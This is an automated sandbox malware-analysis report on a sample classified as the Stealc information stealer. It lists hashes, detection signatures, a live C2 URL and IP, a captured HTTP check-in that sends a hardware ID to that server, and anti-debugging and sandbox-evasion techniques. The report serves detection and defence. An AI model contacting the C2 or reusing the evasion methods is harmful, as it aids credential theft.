
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1543217
MD5: d42e9bebeb9d3f72398f5a5211b649e1
SHA1: 677dc85715152bdc047d55a0a7843ea53690274c
SHA256: 70d701780ae74623c6f20f75516cecba15aff040750f911bc73b311a5482b622
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3356, cmdline: "C:\Users\user\Desktop\file.exe", MD5: D42E9BEBEB9D3F72398F5A5211B649E1)
  • cleanup

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Yara matches (Source | Rule | Description | Author):
  • dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  • 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • Process Memory Space: file.exe PID: 3356 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • Process Memory Space: file.exe PID: 3356 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  • 0.2.file.exe.9e0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts:
  • Timestamp: 2024-10-27T13:04:03.454796+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP


                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.9e0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------JKECGHCFIJDAAKFHJJDH Content-Disposition: form-data; name="hwid" 6A5EB7216C1A2447771074 ------JKECGHCFIJDAAKFHJJDH Content-Disposition: form-data; name="build" puma ------JKECGHCFIJDAAKFHJJDH--
Source: Joe Sandbox View | IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009E4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------JKECGHCFIJDAAKFHJJDH Content-Disposition: form-data; name="hwid" 6A5EB7216C1A2447771074 ------JKECGHCFIJDAAKFHJJDH Content-Disposition: form-data; name="build" puma ------JKECGHCFIJDAAKFHJJDH--
Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/3C;
Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2101658537.00000000013F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpJ

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBB093
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBF1EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB3991
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CCC94A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E17972
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB8904
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB0104
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DACA21
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E5F219
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB1BD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7C3FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D35B66
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBBB65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB6DD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E2BDD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DAE5A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CA26D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E956FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D886F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBD63B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D927D8
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009E45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: viycrjrr ZLIB complexity 0.994612532747006
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\HBN1DL2F.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1866752 > 1048576
Source: file.exe | Static PE information: Raw size of viycrjrr is bigger than: 0x100000 < 0x1a1800

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.9e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;viycrjrr:EW;xfsmgicr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;viycrjrr:EW;xfsmgicr:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cae21 should be: 0x1cf434
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: viycrjrr
Source: file.exe | Static PE information: section name: xfsmgicr
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA30ED push 74C997D3h; mov dword ptr [esp], ebx | 0_2_00EA3E99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 1295D803h; mov dword ptr [esp], esp | 0_2_00DBA0E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], edi | 0_2_00DBA134
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], 6477CCFFh | 0_2_00DBA16D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push edi; mov dword ptr [esp], ebx | 0_2_00DBA178
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 08219782h; mov dword ptr [esp], edx | 0_2_00DBA1B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 2F63DA4Ah; mov dword ptr [esp], edi | 0_2_00DBA1DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 5A2E2576h; mov dword ptr [esp], eax | 0_2_00DBA21B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], eax | 0_2_00DBA227
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], eax | 0_2_00DBA236
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], esi | 0_2_00DBA2E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push edi; mov dword ptr [esp], 7AF56F19h | 0_2_00DBA344
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], 7B7FA62Ch | 0_2_00DBA362
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push edx; mov dword ptr [esp], eax | 0_2_00DBA3A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 6C936F36h; mov dword ptr [esp], edx | 0_2_00DBA3E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 2CFA03BBh; mov dword ptr [esp], ebx | 0_2_00DBA3ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], 74F8AE41h | 0_2_00DBA3F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 30122E1Ch; mov dword ptr [esp], ebp | 0_2_00DBA43D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 5601B85Bh; mov dword ptr [esp], edx | 0_2_00DBA4E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebx; mov dword ptr [esp], ecx | 0_2_00DBA5DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 177435ACh; mov dword ptr [esp], ebx | 0_2_00DBA634
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push esi; mov dword ptr [esp], 4A8DD2FEh | 0_2_00DBA655
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], ebx | 0_2_00DBA665
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 66547C81h; mov dword ptr [esp], ecx | 0_2_00DBA713
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push eax; mov dword ptr [esp], 769DC6E3h | 0_2_00DBA7C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], 7FF70B32h | 0_2_00DBA7EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 54DDB361h; mov dword ptr [esp], edx | 0_2_00DBA804
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ecx; mov dword ptr [esp], 771B1670h | 0_2_00DBA82C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push ebp; mov dword ptr [esp], 5CBD4B43h | 0_2_00DBA83E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push 63F74AAAh; mov dword ptr [esp], ecx | 0_2_00DBA87C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DBA0D2 push eax; mov dword ptr [esp], 7DF7A362h | 0_2_00DBA8EA
Source: file.exe | Static PE information: section name: viycrjrr entropy: 7.953397310962952

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13670
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4239E second address: C423A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC4C87 second address: DC4C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB8133 second address: DB8137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB8137 second address: DB8152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F66B1272F5Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB8152 second address: DB8157 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DB8157 second address: DB8162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3C77 second address: DC3C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC3C81 second address: DC3C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC4387 second address: DC4396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC4396 second address: DC43BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B1272F65h 0x00000008 jnl 00007F66B1272F56h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC43BB second address: DC43BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC43BF second address: DC43C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC451F second address: DC4527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC4527 second address: DC452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC452D second address: DC4533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5EAD second address: DC5EEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F66B1272F69h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 jmp 00007F66B1272F68h 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5EEE second address: DC5F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66B07B4FAEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 ja 00007F66B07B4FA8h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5F12 second address: DC5F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F66B1272F56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC5FFA second address: DC603D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 4FBE1602h 0x00000012 jo 00007F66B07B4FACh 0x00000018 xor ecx, dword ptr [ebp+122D29A6h] 0x0000001e lea ebx, dword ptr [ebp+12457D55h] 0x00000024 mov edx, esi 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push ebx 0x0000002a jmp 00007F66B07B4FB8h 0x0000002f pop ebx 0x00000030 rdtsc
